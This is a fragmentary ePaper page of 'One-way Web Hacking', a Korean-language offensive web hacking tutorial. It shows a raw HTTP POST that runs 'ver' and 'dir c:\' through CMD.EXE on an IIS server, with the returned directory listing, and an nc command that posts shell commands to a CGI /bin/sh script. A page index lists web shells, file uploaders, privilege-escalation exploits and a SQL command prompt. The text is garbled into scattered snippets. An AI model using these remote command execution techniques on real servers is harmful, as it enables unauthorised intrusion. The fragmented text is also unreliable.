One-way Web Hacking

More documents

Recommendations

Info

Content-length: 17 ver dir c:\ exit HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Date: Wed, 08 Dec 1999 06:13:19 GMT Content-Type: application/octet-stream Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\Inetpub\scripts>ver Windows NT Version 4.0 C:\Inetpub\scripts>dir c:\ Volume in drive C has no label. Volume Serial Number is E43A-2A0A Directory of c:\ 10/04/00 05:28a WINNT 10/04/00 05:31a Program Files 10/04/00 05:37a TEMP 10/04/00 07:01a Inetpub 10/04/00 07:01a certs 11/28/00 05:12p software 12/06/00 03:46p src
12/07/00 12:50p weblogic 12/07/00 12:53p weblogic_publish 12/07/99 01:11p Java<strong>Web</strong>Server2.0 12/07/99 06:49p 134,217,728 pagefile.sys 12/07/99 07:24a urlscan 12/07/99 04:55a Netscape C:\Inetpub\scripts>exit $ 13 File(s) 134,217,728 bytes 120,782,848 bytes free CMD.EXE가 명령을 적절하게 받아들이기 위해, 웹 서버가 CMD.EXE의 ouput을 적절하게 리턴하기 위해서는 주의가 필요하다. 위의 예에서 우리는 CMD.EXE에 대한 입력 스트림이 적절하게 종결되도록 하기 위해 “exit” 명령을 포함시켰다. “exit”에 의해 취해진 여분의 문자를 염두에 두고 POST 리퀘스트의 Content-length 역시 적절하게 계산되었다. 3.1.2 /bin/sh 에 명령 POST 하기 아래의 예는 /bin/sh와 함께 실행되는 세 가지 명령을 보여주며, http://www2.example.com/cgi-bin/sh.cgi에 접근이 가능하다. $ nc www2.example.com 80 POST /cgi-bin/sh.cgi HTTP/1.0 Host: www2.example.com Content-type: text/html Content-length: 60
Page 1 and 2: One-way Web Hacking "Necessity is t
Page 3 and 4: 6.1.1 Windows 공격 툴 업로드
Page 5 and 6: web application server는 스크립
Page 7 and 8: 3.0 entry point 찾기 one-way hack
Page 9: usr/local/apache/cgi-bin/sh.cgi| sh
Page 13 and 14: drwxrwxr-x 2 root root 4096 Feb 2 2
Page 15 and 16: } print "By Saumil Shah (c) net-squ
Page 17 and 18: ## uncomment the while loop below #
Page 19 and 20: # Able to send arbitrary commands t
Page 21 and 22: @commands = ("\n", "\necho 'Content
Page 23 and 24: } print S 'POST '. $file. " HTTP/1.
Page 25 and 26: C:\Inetpub\scripts>exit $ post_sh.p
Page 27 and 28: 웹 기반의 command prompt와 같
Page 29 and 30: {$errflag="Short Read: wanted $len,
Page 31 and 32: } die $@ if $errflag; if ($name) {
Page 33 and 34: 1; } } @dummy = split(/\//, $fn); $
Page 35 and 36: } sub MyBaseUrl { } local ($ret, $p
Page 37 and 38: } sub PrintEnv { } &PrintVariables(
Page 39 and 40: ASP 기반의 command prompt 스크
Page 41 and 42: %> } } } catch(IOException e) { }
Page 43 and 44: 위의 명령들은 목표 웹 서
Page 45 and 46: else { } $file = '/'; if(defined($A
Page 47 and 48: sub httpconnect { } my ($server, $p
Page 49 and 50: 5.0 File uploader 목표 웹 서버
Page 51 and 52: Else Else Else Binary = Empty Err.R
Page 53 and 54: sFrom = LCase(From) PosB = InStr(sF
Page 55 and 56: Function vbsSaveAs(FileName, ByteAr
Page 57 and 58: #!/usr/bin/perl require "cgi-lib.pl
Page 59 and 60: 권한 상승 exploit이 비상호
Page 61 and 62:
6.1.2 idq.dll - 권한 상승 다
Page 63 and 64:
* Linux kernel ptrace/kmod local ro
Page 65 and 66:
unsigned long * src; } int i, len;
Page 67 and 68:
if (err == -1) } fatal("[-] Unable
Page 69 and 70:
eturn 0; } 아래의 스크린샷
Page 71 and 72:
7.0 웹 기반의 SQL Command Promp
Page 73 and 74:
--> database. Present version works
Page 75 and 76:
Response.write("") Response.write("
Page 77 and 78:
Response.write("") Response.write("
Page 79 and 80:
Response.Write "" For F = 0 to Numb
Page 81 and 82:
Query String:
Page 83 and 84:
7.4 웹 어플리케이션 도용
Page 85 and 86:
7.6 저장된 프로시저 실행
Page 87:
SSL은 어플리케이션을 보호
show all

One-way Web Hacking

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?